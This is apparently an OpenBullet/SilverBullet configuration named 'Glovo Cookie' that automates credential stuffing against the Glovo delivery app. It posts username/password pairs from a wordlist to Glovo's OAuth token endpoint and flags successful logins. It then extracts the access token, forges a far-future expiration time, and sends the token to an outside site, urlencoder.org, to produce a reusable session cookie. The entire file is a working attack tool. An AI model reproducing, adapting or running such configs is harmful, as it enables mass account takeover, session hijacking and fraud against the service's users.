[SETTINGS]
{
  "Name": "Glovo Cookie",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-10-31T16:53:32.6337987+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Glovo USE ON VALID ACC",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#POST REQUEST POST "https://api.glovoapp.com/oauth/token" 
  CONTENT "{\"grantType\":\"password\",\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  COOKIE "\"twoFactorToken\": null,\"expirationTime\":1798103533298" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CHECK KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\":\"Authentication failed:" 
    KEY "bad credentials\",\"" 
    KEY "Authentication failed." 
  KEYCHAIN Success OR 
    KEY "{\"accessToken\":\"" 
    KEY "\",\"twoFactorToken\":null" 

#TK PARSE "<SOURCE>" JSON "" -> VAR "TK" 

FUNCTION Translate 
  KEY "null}" VALUE "null,\"expirationTime\":1798103533298}" 
  "<TK>" -> VAR "deez" 

REQUEST POST "https://www.urlencoder.org/" 
  CONTENT "input=<deez>&charset=UTF-8&separator=lf" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "placeholder=\"Result goes here...\" spellcheck=\"false\">" "</textarea>" -> VAR "dez" 

FUNCTION Translate UseVar=TRUE 
  KEY "%7D" VALUE "}" 
  "<dez>" -> VAR "11" 

FUNCTION Translate 
  KEY "%7B" VALUE "{" 
  "<11>" -> CAP "12" 

